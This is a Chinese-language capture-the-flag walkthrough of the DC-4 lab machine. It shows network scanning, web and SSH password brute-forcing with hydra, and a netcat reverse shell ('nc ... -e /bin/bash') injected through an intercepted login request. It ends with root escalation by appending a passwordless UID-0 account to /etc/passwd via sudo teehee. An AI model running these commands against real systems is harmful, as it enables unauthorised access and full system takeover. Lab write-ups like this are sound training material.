环境下载
环境配置
注:DC4这关跟DC3一样只有一个FLAG,我们要通过提权的方法一步一步获取
信息探测
nmap -sP 192.168.100.0/24
nmap -sV -A -p- 192.168.100.13
发现这里开着80端口以及ssh服务22端口,我们先进入80端口看一下
获取FLAG
进入了网站我们尝试弱口令爆破,万能密码输入,结果都不行,我们用AWVS尝试扫描一下
我们发现这个网站并不存在什么高危漏洞,可知,这应该是个简单的登录框,并不是什么cms,接下来我们尝试密码爆破
爆破出他的密码为happy,我们登录进去看一看
发现他是通过命令的方式来执行的,我们用BP抓包看一下
果然是这样,既然如此我们就通过这种方式来反弹shell
我们先开启nc监测
接下来去BP那边修改一下请求包,并且发送
nc 192.168.100.13 1234 -e /bin/bash
# nc+192.168.79.128+8080+-e+/bin/bash
# 空格+号代替
成功反弹
我们先查看一下有什么文件
我们找到了jim文件下包含了一个密码本,我们将此密码本保存下来,去kali中爆破一下
hydra -l jim -P 1.txt -I -T 64 ssh://192.168.100.13:22
成功爆破出jim的密码,那我们就尝试登录
ssh jim@192.168.100.13 -p 22
成功登录,他提示我们有一封邮件需要去查看一下,那我们去看一看
cd /var/mail
我们得到了charles的密码,那我们登录他的账号看一下
发现什么都没有,那我们 查看 使用sudo运行的命令
sudo -l
发现提权关键词teehee,我们使用此命令来操作一下
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
# 用户名admin 没有密码为管理员权限 进入的时候运行/bin/bash
成功提权
那我们去root目录下获取FLAG
成功获取,结束!